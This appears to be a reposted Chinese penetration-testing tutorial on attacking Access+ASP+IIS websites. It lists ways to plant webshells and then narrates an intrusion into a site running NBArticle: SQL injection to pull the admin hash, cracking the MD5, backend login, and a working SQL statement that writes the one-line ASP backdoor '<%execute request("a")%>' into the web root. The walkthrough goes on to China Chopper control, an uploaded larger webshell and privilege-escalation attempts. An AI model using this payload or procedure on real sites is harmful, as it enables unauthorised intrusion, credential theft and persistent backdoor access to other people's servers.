安基网 首页 安全 渗透测试 查看内容

Access注入获取Webshell

2019-4-1 11:36| 投稿: xiaotiger |来自: 互联网


免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

摘要: Access+Asp+IIS架构是最早的一种网站架构,主要用在公司站点或者小规模公司,对于这种架构网站的漏洞主要有SQL注入、文件目录信息泄露、文件上传、数据库下载以及弱口令等,其主要威胁来自于SQL注入,虽然目前Asp站点相对较少,但其是网络攻防体系中不可缺少的一部分。1.1.1Access网站后台加密以及注入 ...

Access+Asp+IIS架构是最早的一种网站架构,主要用在公司站点或者小规模公司,对于这种架构网站的漏洞主要有SQL注入、文件目录信息泄露、文件上传、数据库下载以及弱口令等,其主要威胁来自于SQL注入,虽然目前Asp站点相对较少,但其是网络攻防体系中不可缺少的一部分。

1.1.1Access网站后台加密以及注入处理思路

1. Access+Asp+IIS架构后台加密算法

对于Access+Asp+IIS架构最常见的是md5 16位或者32位加密,有安全意识的站点会采用md5(password,salt)类似变异加密算法,其中最常见的就是通过自定义salt为一个强健的字符串,使得即使弱口令+salt的md5加密通过cmd5.com网站无法进行暴力破解。

2.SQL注入点处理思路

对于Access数据库+ASP网站存在的SQL注入点的一般处理思路主要有下面五个途径:

(1)查看是否有直接可以上传Webshell的地方。如果存在则可以直接上传Webshell来获得Webshell控制权限。

(2)存在上传地址,但无法直接上传Webshell,可以尝试通过IIS解析漏洞等方法来绕过对文件后缀名的验证。

(3)备份数据库。在存在输入的页面加入一句话木马,然后将数据库备份为asa或者asp的文件。

(4)本地构建上传页面,通过抓包等方法本地提交到服务器。

(5)通过查询直接将一句话写入到一个文件中,方法即是本文用到的方法。

1.1.2渗透Access网站思路

Access网站的渗透思路跟其它网站类型类似,下面是根据笔者的经验进行总结,仅供参考。

1.对网站进行工具扫描

使用HDSI、明小子、WebCruiser、WVS等扫描工具软件进行初始漏洞扫描,获取最常见的漏洞。

2.手工对存在参数传入的地址进行测试

对网站存在参数传入的地方通过特殊字符等方式进行判断,如果存在出错,则可以进行手工或者工具自动注入测试。

3.使用工具对存在SQL注入点的地址进行漏洞测试,尝试获取表以及数据库内容。

4.获取管理员表及其用户名和密码等信息。

5.登录后台尝试通过前面提及的SQL注入点处理思路进行处理。

6.扫描后台地址,常见默认后台为admin,manage等。很多网站为了管理方便,往往会在首页添加链接地址。

7.手工挖掘或者测试已有漏洞,如果网站系统采用开源或者公开CMS,则可以通过互联网搜索历史漏洞,并对该网站尝试漏洞利用。如果历史漏洞无法使用,则需要手动挖掘系统漏洞。

8.网站敏感文件扫描,可以获取一些网站备份文件。

9.有些网站对mdb文件未做防下载处理,知道数据库地址后可以直接下载。如果文件名使用了特殊字符,则可以通过url地址转换来进行下载。

10.知道后台地址后,可以通过burpsuite等工具软件进行密码的暴力破解。

11.通过百度对网站进行检索,获取可以利用的信息。

1.1.3一个SQL注入漏洞利用实例

1.扫描漏洞

本次渗透测使用WebCruiser,软件官方下载地址:http://sec4app.com/。该软件不需要安装,不过需要.net FrameWork2.0以上环境支持。运行后如图1所示,在URL中输入本次需要扫描的地址“http://www.xxx.org”,然后在菜单栏中单击“Scanner”和“Scan Current Site”对目标站点进行扫描。WebCruiser扫描效果还是不错的,虽然也有误报,但对java扫描效果非常好。本次扫描结果表明目标网站有两个漏洞一个是SQL注入漏洞,另外一个是跨站漏洞。

图1 扫描漏洞

2.SQL注入测试

在进行SQL注入测试前,需要更多的收集目标所使用系统的信息,通过探测和查看网页源代码,获知该系统使用NBArticle,通过网上下载了NBArticle的两个版本,对其数据库进行了分析和研究,该CMS系统管理员表名为NB_Master,将该表名和表字段添加到WebCruiser的系统设置中。

在漏洞扫描中选中存在SQL注入点的记录,然后进行SQL注入测试, SQL注入测试跟其它的SQL注入测试步骤相同,先猜测数据库,然后猜测表,再猜测表列名,最后猜测数据。如图2所示,直接获取了数据库中管理员的密码。

技巧:

(1)由于已经知道该系统采用Access,因此在SQL注入测试时,Databases直接选择Access。

(2)在扫描出漏洞后,可以先在浏览器中进行sql注入测试,判断数据库类型。虽然WebCruiser可以自动扫描出数据库的类型,但效果不是特别好,软件有时候会长时间没有反应。

图2 获取数据

3.进入后台

获取的密码值为16位的Cmd5加密值,将该值放入cmd5.com和xmd5.com进行破解,密码设置不是很复杂,免费就能查到。NBArticle的后台地址为http://www.xxx.org/manger/index.html,打开后台地址后输入管理员账号和密码,成功进入后台,如图3所示,虽然成功进入后台,但该管理界面中未提供上传功能,目标网站对代码进行过修改,有些功能都不能使用。

图3 进入后台

4.获取Webshell

在后台中虽然有数据库备份,但无法获取数据库的真实地址,因此无法进行备份。也就无法通过一句话木马进行数据库备份。但在高级管理中提供了SQL语句直接执行功能,如果知道网站的真实路径,那么可以通过执行SQL语句直接生成一句话密码。通过分析发现,后台首页提供了服务器信息,如图4所示,直接获取了网站后台的真实地址。

图4 获取网站真实路径


5.导入shell到网站根目录

如图5所示,在SQL语句中输入“SELECT <%execute request("a")%> into [NB_master] in d:\wwwroot\\x.asp;a.xls excel 8.0; from NB_Master”然后执行即可获得一句话后门。注意NB_Mater是CMS系统真实存在的表,否则无法执行成功。使用中国菜刀进行一句话木马测试,如图6所示,成功获得该网站的Webshell权限。

图5 执行SQL语句获取Webshell

图6 获取Webshell


6.上传大马进行控制

在中国菜刀中直接上传一个aspnet的Webshell,运行后如图7所示,通过该Webshell来查看数据库以及系统配置等信息。

图7进一步收集信息


由于该网站的权限配置很严格,通过多种提权工具和方法未能获得系统管理员权限,只能放弃。



小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!

本文出自:https://www.toutiao.com/a6674520017704321549/

免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

 最新
返回顶部